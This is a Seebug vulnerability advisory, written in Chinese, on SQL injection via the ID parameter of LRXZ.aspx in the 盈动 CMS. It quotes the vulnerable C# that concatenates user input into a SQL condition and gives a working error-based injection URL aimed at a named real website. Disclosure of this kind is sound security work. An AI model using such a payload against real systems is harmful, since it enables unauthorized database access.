盈动信息发布系统 /sites/main/LRXZ.aspx文件ID参数SQL注入漏洞

2016-05-24T00:00:00
ID SSV:91659
Type seebug
Reporter hhxx
Modified 2016-05-24T00:00:00

Description

0x01 漏洞框架

系统:盈动信息发布系统

盈动信息发布系统为杭州东方盈动计算机网络工程有限公司一款cms产品。

注入:

问题文件:/sites/main/LRXZ.aspx

问题参数:ID

0x02 漏洞详情

代码分析:

``` protected void Page_Load(object sender, EventArgs e)

    {

    略...

            string text;

            if (this.Page.Request.QueryString["ID"] != null)

            {

                text = this.Page.Request.QueryString["ID"];/*获取参数*/

            }

            else

            {

                text = "465";

            }

            this.lblID.Text = text;

            string condition = "ClassID='" + this.lblID.Text + "' AND WebID=1 AND Deleted='0'";/*直接拼接SQL*/

            this.GetPageInfo(condition);/*注入A*/

            this.BindData(condition);/*注入B*/

        }

    }

```

this.GetPageInfo分析:

``` private void GetPageInfo(string condition)

{

SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr());

SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection);

sqlCommand.CommandType = CommandType.StoredProcedure;

sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles";

sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();

sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = 1;

sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = true;

sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;/*将有问题的sql代入Get_SiteData_ByPagination存储过程*/

sqlConnection.Open();

this.PageInfo.set_RecordCount((int)sqlCommand.ExecuteScalar());

sqlConnection.Close();

} ```

this.BindData分析:

``` private void BindData(string condition)

{

this.mydatalist.DataSource = this.CreateSource(condition);/*跟进此方法*/

略...

}

this.CreateSource:

private ICollection CreateSource(string condition)

{

SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr());

SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection);

sqlCommand.CommandType = CommandType.StoredProcedure;

sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles";

sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();

sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = this.PageInfo.get_CurrentPageIndex();

sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = false;

sqlCommand.Parameters.Add("@FldName", SqlDbType.NVarChar, 255).Value = "OnTop DESC, UpdateTime";

sqlCommand.Parameters.Add("@KeyFld", SqlDbType.NVarChar, 255).Value = "NewsID";

sqlCommand.Parameters.Add("@OrderType", SqlDbType.Bit).Value = true;

sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;/*将问题SQL直接代入 Get_SiteData_ByPagination*/

SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);

DataSet dataSet = new DataSet("GuestList");

sqlConnection.Open();

sqlDataAdapter.Fill(dataSet, "Guest");

sqlConnection.Close();

return dataSet.Tables["Guest"].DefaultView;

} ```

漏洞利用:

http://www.jhjdedu.org/sites/main/LRXZ.aspx?id=2'and 1=@@version and'1'='1

Pocsuite:

0x03 修复方式

1、过滤漏洞文件参数

2、使用加速乐等防护产品